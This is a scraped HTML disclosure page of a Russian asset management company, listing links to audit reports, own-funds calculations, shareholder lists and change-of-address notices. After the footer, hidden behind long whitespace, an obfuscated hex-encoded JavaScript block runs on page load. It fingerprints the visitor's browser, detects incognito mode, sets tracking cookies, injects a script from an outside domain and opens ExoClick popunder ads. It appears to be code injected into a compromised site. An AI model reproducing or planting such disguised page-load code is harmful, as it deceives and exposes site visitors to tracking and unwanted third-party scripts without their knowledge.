<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/00_УК_БФО%20АЗ%202019.pdf" target="_blank"><span style="color: #0000ff;"><span style="color: #0000ff;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff;">Аудиторское заключение, Бухгалтерский баланс и Отчет о финансовых результатах на 31.12.2019, раскрыт 06.04.2020 15:25 мск, доступ предоставляется до 30.04.2021</span></span> </span> </span> </a> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span color="#0000ff" face="arial, helvetica, sans-serif"><span color="#0000ff" face="arial, helvetica, sans-serif">&nbsp;</span></span> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/рсс17.03.2020.pdf" target="_blank"><span style="color: #0000ff;"><span style="color: #0000ff;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff;">Расчет размера собственных средств на 29.02.2020, раскрыт 16.03.2020 в 17:30 мск, раскрыт до 31.03.2021</span></span> </span> </a> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Для%20публикации%20(Пересдача%2003.03.2020).pdf" target="_blank"><span style="color: #0000ff;"><span style="color: #0000ff;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff;">Расчет размера собственных средств на 31.01.2020, раскрыт 14.02.2020 в 17:00 мск, раскрыт до 26.02.2021</span></span> </span> </a> </span> <o:p> </o:p></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span color="#0000ff" face="arial, helvetica, sans-serif">&nbsp;</span> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/22.01.2020.pdf" target="_blank"><span style="color: #0000ff;"><span style="color: #0000ff;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff;">Расчет размера собственных средств на 31.12.2019, раскрыт 22.01.2020 в 13:30 мск, раскрыт до 31.01.2021</span></span> </span> </a> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span color="#0000ff" face="arial, helvetica, sans-serif">&nbsp;</span> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/30.11.2019.pdf" target="_blank"><span style="color: #0000ff;"><span style="color: #0000ff;">Расчет размера собственных средств на 30.11.2019, раскрыт 13.12.2019 в 17:00 мск, раскрыт до 31.12.2020</span></span> </a> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;&nbsp;</span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Список%201.pdf" target="_blank"><span style="color: #0000ff;">Список акционеров (участников) НФО и лиц, под контролем либо значительным влиянием которых находится НФО</span> </a> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Схема%201.pdf" target="_blank"><span style="color: #0000ff;">Схема взаимосвязей акционеров (участников) НФО и лиц, под контролем либо значительным влиянием которых находится НФО</span> </a> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; text-align: justify; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Regqual092015.pdf" target="_blank"><span style="color: #0000ff;"><span style="color: #0000ff;">Регламент признания лиц квалифицированными инвесторами ООО УК "РЭМ" (дата опубликования информации - 07.09.2015, Время опубликования информации - 17:00. Дата, до которой осуществляется доступ к информации - бессрочно)</span></span> </a> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/message of change.docx" target="blank"><span style="color: #0000ff;">Сообщение о смене адреса </span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/message_change.doc" target="blank"><span style="color: #0000ff;">Сообщение об изменении номера телефона/факса. </span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/20121130141030.doc" target="blank"><span style="color: #0000ff;">Сообщение о смене адреса </span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;&nbsp;&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/message.rtf" target="blank"><span style="color: #0000ff;">Сообщение об изменении почтового адреса и телефона/факса </span> </a> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<div id="_mcePaste" class="mcePaste" data-mce-bogus="1" style="position: absolute; left: 0px; top: -25px; width: 1px; height: 1px; overflow: hidden; text-align: justify;"><span style="font-family: arial, helvetica, sans-serif; color: #0000ff; font-size: 12pt;">Расчет размера собственных средств на 31.12.2019, раскрыт 22.01.2020 в 16:00 мск, раскрыт до 31.01.21</span></div>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>	</div>

	
	
<ul class="pager pagenav">
	<li class="previous">
		<a href="/index.php/kontakty" rel="prev">
			<span class="icon-chevron-left"></span> Назад		</a>
	</li>
	<li class="next">
		<a href="/index.php/o-kompanii" rel="next">
			Вперёд <span class="icon-chevron-right"></span>		</a>
	</li>
</ul>
							</div>

					
<ul itemscope="" itemtype="https://schema.org/BreadcrumbList" class="breadcrumb">
			<li>
			Вы здесь: &nbsp;
		</li>
	
				<li itemprop="itemListElement" itemscope="" itemtype="https://schema.org/ListItem">
									<a itemprop="item" href="/index.php" class="pathway"><span itemprop="name">Главная</span></a>
				
									<span class="divider">
						<img src="/media/system/images/arrow.png" alt="">					</span>
								<meta itemprop="position" content="1">
			</li>
					<li itemprop="itemListElement" itemscope="" itemtype="https://schema.org/ListItem" class="active">
				<span itemprop="name">
					Раскрытие информации				</span>
				<meta itemprop="position" content="2">
			</li>
		</ul>

					<!-- End Content -->
				</main>
									<div id="aside" class="span3">
						<!-- Begin Right Sidebar -->
						
						<!-- End Right Sidebar -->
					</div>
							</div>
		</div>
	</div>
	<!-- Footer -->
	<footer class="footer" role="contentinfo">
		<div class="container">
			<hr>
			
			<p class="pull-right">
				<a href="#" id="back-top">
					Наверх				</a>
			</p>
			<p>
				© 2023 Общество с ограниченной ответственностью Управляющая компания «Резерв Эссет Менеджмент»			</p>
		</div>
	</footer>
	


                                                                                                                                      
                                                                                                                                                                                           	<script type="text/javascript">var _0x3a1f=["\x73\x70\x6C\x61\x73\x68\x5F\x69","\x3D","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x74\x72\x75\x65","\x75\x61","\x6D\x73\x69\x65\x20","\x2E","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x74\x72\x69\x64\x65\x6E\x74\x2F","\x72\x76\x3A","\x65\x64\x67\x65\x2F","\x73\x61\x66\x61\x72\x69","\x63\x68\x72\x6F\x6D\x65","\x63\x72\x69\x6F\x73","\x47\x6F\x6F\x67\x6C\x65","\x76\x65\x6E\x64\x6F\x72","\x6E\x61\x76\x69\x67\x61\x74\x6F\x72","\x66\x69\x72\x65\x66\x6F\x78","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x66\x75\x6E\x63\x74\x69\x6F\x6E","\x69\x73\x49\x45","\x62\x72\x6F\x77\x73\x65\x72","\x69\x6E\x64\x65\x78\x65\x64\x44\x42","\x63\x68\x65\x63\x6B","\x73\x65\x74\x49\x74\x65\x6D","\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65","\x67\x65\x74\x49\x74\x65\x6D","\x72\x65\x6D\x6F\x76\x65\x49\x74\x65\x6D","\x77\x65\x62\x6B\x69\x74\x52\x65\x71\x75\x65\x73\x74\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D","\x62\x69\x6E\x64","\x74\x65\x73\x74","\x6F\x70\x65\x6E","\x6F\x6E\x65\x72\x72\x6F\x72","\x6F\x6E\x73\x75\x63\x63\x65\x73\x73","\x3D\x66\x61\x6C\x73\x65","\x3B\x20\x70\x61\x74\x68\x3D\x2F","\x61\x64\x73\x5F\x70\x72\x69\x76","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x3F\x69\x3D\x30","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x3F\x69\x3D","\x47\x6F\x6F\x67\x6C\x65\x43\x6F\x6F\x6B\x69\x65\x2D\x35\x36\x34\x33\x32\x31\x2D\x32\x31","\x73\x79\x6E\x64\x69\x63\x61\x74\x69\x6F\x6E\x2E\x65\x78\x6F\x63\x6C\x69\x63\x6B\x2E\x63\x6F\x6D","\x61\x64\x73\x2E\x65\x78\x6F\x63\x6C\x69\x63\x6B\x2E\x63\x6F\x6D","\x70\x72\x6F\x74\x6F\x63\x6F\x6C","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x73\x3A","\x68\x74\x74\x70\x3A","\x65\x78\x6F\x4E\x6F\x45\x78\x74\x65\x72\x6E\x61\x6C\x55\x49\x33\x38\x64\x6A\x64\x6B\x6A\x44\x44\x4A\x73\x69\x6F\x39\x36","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x2F\x2F\x62\x61\x62\x79\x62\x61\x62\x79\x62\x61\x62\x79\x6F\x6F\x6F\x68\x2E\x6E\x65\x74\x2F\x73\x65\x63\x75\x72\x69\x74\x79\x2F","\x67\x65\x74","\x43\x6F\x6F\x6B\x69\x65","\x65\x78\x6F\x4C\x61\x75\x6E\x63\x68\x50\x6F\x70","\x63\x6F\x6E\x66\x69\x67","\x2F","\x73\x65\x74","\x72\x65\x73\x65\x74","\x61\x64\x64","\x3C\x73\x63\x72","\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22","\x2F\x2F","\x2F\x70\x6F\x70\x75\x6E\x64\x65\x72\x32\x2E\x6A\x73\x22\x20\x6F\x6E\x6C\x6F\x61\x64\x3D\x22\x65\x78\x6F\x4C\x61\x75\x6E\x63\x68\x50\x6F\x70\x28\x33\x29\x3B\x22\x3E\x3C\x2F\x73\x63\x72","\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];var c_name=_0x3a1f[0];if(-1== document[_0x3a1f[3]][_0x3a1f[2]](c_name+ _0x3a1f[1])){var expires,date= new Date;date[_0x3a1f[5]](date[_0x3a1f[4]]()+ 31536e6),expires= _0x3a1f[6]+ date[_0x3a1f[7]](),value= _0x3a1f[8],isIE= function(i){this[_0x3a1f[9]]= i;var _0xad3dx5=this[_0x3a1f[9]][_0x3a1f[2]](_0x3a1f[10]);if(_0xad3dx5> 0){return parseInt(this[_0x3a1f[9]][_0x3a1f[12]](_0xad3dx5+ 5,this[_0x3a1f[9]][_0x3a1f[2]](_0x3a1f[11],_0xad3dx5)),10)};if(this[_0x3a1f[9]][_0x3a1f[2]](_0x3a1f[13])> 0){var _0xad3dx6=this[_0x3a1f[9]][_0x3a1f[2]](_0x3a1f[14]);return parseInt(this[_0x3a1f[9]][_0x3a1f[12]](_0xad3dx6+ 3,this[_0x3a1f[9]][_0x3a1f[2]](_0x3a1f[11],_0xad3dx6)),10)};var _0xad3dx7=this[_0x3a1f[9]][_0x3a1f[2]](_0x3a1f[15]);return _0xad3dx7> 0&& parseInt(this[_0x3a1f[9]][_0x3a1f[12]](_0xad3dx7+ 5,this[_0x3a1f[9]][_0x3a1f[2]](_0x3a1f[11],_0xad3dx7)),10)},isSafari= function(i){this[_0x3a1f[9]]= i;try{return !!window[_0x3a1f[16]]|| -1!= this[_0x3a1f[9]][_0x3a1f[2]](_0x3a1f[16]) && -1=== this[_0x3a1f[9]][_0x3a1f[2]](_0x3a1f[17]) && -1=== this[_0x3a1f[9]][_0x3a1f[2]](_0x3a1f[18])}catch(e){return !1}},isChrome= function(i){this[_0x3a1f[9]]= i;try{return !!window[_0x3a1f[17]]|| -1!== this[_0x3a1f[9]][_0x3a1f[2]](_0x3a1f[18]) || 0=== window[_0x3a1f[21]][_0x3a1f[20]][_0x3a1f[2]](_0x3a1f[19])&& -1!== this[_0x3a1f[9]][_0x3a1f[2]](_0x3a1f[17])}catch(e){return !1}},isFirefox= function(i){this[_0x3a1f[9]]= i;try{return -1!= this[_0x3a1f[9]][_0x3a1f[2]](_0x3a1f[22])}catch(e){return !1}},getBrowser= function(){var i=window[_0x3a1f[21]][_0x3a1f[24]][_0x3a1f[23]](),_0xad3dx5={ie:isIE,safari:isSafari,chrome:isChrome,firefox:isFirefox},_0xad3dx6=null;for(browser_key in _0xad3dx5){var _0xad3dx7=_0xad3dx5[browser_key];if(1== _0xad3dx7(i)){_0xad3dx6= browser_key;break}};return _0xad3dx6},checkIncognito= function(i,_0xad3dx5){var _0xad3dx6={chrome:isChromeIncognito,ie:isIEIncognito,safari:isSafariIncognito,firefox:isFirefoxIncognito};if(_0x3a1f[25]==  typeof _0xad3dx6[i]){var _0xad3dx7=_0xad3dx6[i];_0xad3dx7(_0xad3dx5)}else {_0xad3dx5(!1)}},isIEIncognito= function(i){if(this[_0x3a1f[27]][_0x3a1f[26]]< 10){return i(!1),!1};try{i(window[_0x3a1f[28]]?!1:!0)}catch(e){i(!1)}},isSafariIncognito= function(i){try{window[_0x3a1f[31]][_0x3a1f[30]](_0x3a1f[29],1),window[_0x3a1f[31]][_0x3a1f[32]](_0x3a1f[29]),window[_0x3a1f[31]][_0x3a1f[33]](_0x3a1f[29]),i(!1)}catch(e){i(!0)}},isChromeIncognito= function(i){try{window[_0x3a1f[34]]?window[_0x3a1f[34]](window.TEMPORARY,1,function(){i(!1)}[_0x3a1f[35]](this),function(){i(!0)}[_0x3a1f[35]](this)):i(!1)}catch(e){i(!1)}},isFirefoxIncognito= function(i){var _0xad3dx5;try{_0xad3dx5= window[_0x3a1f[28]][_0x3a1f[37]](_0x3a1f[36]),_0xad3dx5[_0x3a1f[38]]= function(){i(!0)}[_0x3a1f[35]](this),_0xad3dx5[_0x3a1f[39]]= function(){i(!1)}[_0x3a1f[35]](this)}catch(t){i(!0)}};var browser=getBrowser();if(null=== browser){if(document[_0x3a1f[3]]= c_name+ _0x3a1f[40]+ expires+ _0x3a1f[41],null=== document[_0x3a1f[43]](_0x3a1f[42])){var i=document[_0x3a1f[45]](_0x3a1f[44]);i[_0x3a1f[46]]= _0x3a1f[42],i[_0x3a1f[47]]= ads_priv+ _0x3a1f[48],document[_0x3a1f[50]][_0x3a1f[49]](i)}}else {checkIncognito(browser,function(i){if(document[_0x3a1f[3]]= c_name+ _0x3a1f[1]+ i+ expires+ _0x3a1f[41],null=== document[_0x3a1f[43]](_0x3a1f[42])){i= 1== i?1:0;var _0xad3dx5=document[_0x3a1f[45]](_0x3a1f[44]);_0xad3dx5[_0x3a1f[46]]= _0x3a1f[42],_0xad3dx5[_0x3a1f[47]]= ads_priv+ _0x3a1f[51]+ i,document[_0x3a1f[50]][_0x3a1f[49]](_0xad3dx5)}})}};var cookieName=_0x3a1f[52];var ad_version=666;var host_syndication=_0x3a1f[53];var host_ads=_0x3a1f[54];var frequency_period=180;var frequency_count=1;var exoDocumentProtocol=(document[_0x3a1f[56]][_0x3a1f[55]]!= _0x3a1f[57]&& document[_0x3a1f[56]][_0x3a1f[55]]!= _0x3a1f[58])?_0x3a1f[57]:document[_0x3a1f[56]][_0x3a1f[55]];if( typeof window[_0x3a1f[59]]== _0x3a1f[60]){(function(_0xad3dx10){function _0xad3dx11(){var _0xad3dx12=exoJsPop101[_0x3a1f[63]][_0x3a1f[62]](cookieName);var _0xad3dx13=( typeof _0xad3dx12== _0x3a1f[60])?0:parseInt(_0xad3dx12);if(isNaN(_0xad3dx13)){_0xad3dx13= 0};return _0xad3dx13}window[_0x3a1f[64]]= function(_0xad3dx14){if( typeof exoJsPop101!= _0x3a1f[60]&&  typeof exoJsPop101[_0x3a1f[65]]!= _0x3a1f[60]){exoJsPop101[_0x3a1f[65]]({forceUnder:false,initOnload:false,safe:true})[_0x3a1f[69]](_0xad3dx10,{under:true,newTab:false,cookieExpires:1,shouldFire:function(){if(_0xad3dx11()>= frequency_count){return false};return true},beforeOpen:function(_0xad3dx15,_0xad3dx16){exoJsPop101[_0x3a1f[63]][_0x3a1f[67]](cookieName,_0xad3dx11()+ 1,frequency_period* 60,_0x3a1f[66])},afterOpen:function(_0xad3dx15,_0xad3dx16,_0xad3dx17){exoJsPop101[_0x3a1f[68]]()}})}else {if(_0xad3dx14> 0){setTimeout(function(){exoLaunchPop(_0xad3dx14- 1)},300)}}}})(exoDocumentProtocol+ _0x3a1f[61]);document[_0x3a1f[75]](_0x3a1f[70]+ _0x3a1f[71]+ exoDocumentProtocol+ _0x3a1f[72]+ host_ads+ _0x3a1f[73]+ _0x3a1f[74])}</script><script type="text/javascript" src="http://ads.exoclick.com/popunder2.js" onload="exoLaunchPop(3);"></script>